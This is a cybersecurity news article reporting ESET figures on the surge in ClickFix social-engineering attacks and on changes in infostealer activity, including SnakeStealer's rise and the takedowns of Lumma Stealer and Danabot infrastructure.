ClickFix Attacks Surge 517% in 2025

ClickFix social engineering attacks have seen an alarming rise of 517% over the past six months, emerging as the second most prevalent attack vector, following phishing, according to recent data from ESET. The findings indicate that this method constituted nearly 8% of all blocked attacks in the first half of 2025.

ClickFix operates through social engineering tactics that utilize deceptive error messages or verification prompts to manipulate victims into executing a harmful script. This approach capitalizes on users’ inclination to resolve issues independently, rather than consulting their IT departments, thereby facilitating the evasion of security measures as individuals inadvertently compromise their own systems.

First identified by Proofpoint in March 2024, the ClickFix technique rapidly gained momentum, becoming increasingly widespread by the year’s end.

The attack vector is compatible with major operating systems, including Windows, Linux, and macOS. The success of ClickFix has prompted malicious actors to develop builders that enable other cybercriminals to create weaponized landing pages associated with ClickFix. As the variety of ClickFix variants expands, so does the assortment of threats delivered through this method.

Jiří Kropáč, Director of Threat Prevention Labs at ESET, remarked, “The increasing list of threats stemming from ClickFix attacks includes infostealers, ransomware, remote access trojans, cryptominers, post-exploitation tools, and even custom malware associated with nation-state actors.”

A separate analysis by ReliaQuest indicated that ClickFix played a pivotal role in a 10% surge in detected drive-by compromises from March to May 2025.

Major Shifts in Infostealer Landscape

The ESET analysis also revealed significant transitions within the infostealer domain during the first half of 2025, particularly spotlighting the emergence of SnakeStealer. This infostealer became the most commonly detected variant during this time, responsible for 20% of all infections, as per ESET’s telemetry data.

Having been active since 2019, SnakeStealer offers a range of capabilities, including keystroke logging, credential theft, screenshot capturing, and clipboard data collection. Its rise in prevalence aligns with a notable decline in Agent Tesla activity, which saw a 57% reduction in detections compared to the prior six-month period. The decrease in Agent Tesla’s activity is attributed to operators losing access to the servers hosting its source code, although researchers assert that it is not entirely eradicated; rather, new versions are no longer being developed.

May 2025 marked significant law enforcement initiatives targeting notable infostealer infrastructure, likely contributing to ongoing shifts in the cybersecurity landscape. This included the disruption of Lumma Stealer’s infrastructure, leading to the seizure of 2,300 domains. Shortly thereafter, U.S. authorities, in collaboration with Operation Endgame, targeted a substantial segment of Danabot’s infrastructure.

Prior to these disruptions, Lumma Stealer’s activity in the first half of 2025 had risen by 21% compared to the latter half of 2024, while Danabot activity surged even higher, climbing by 52%.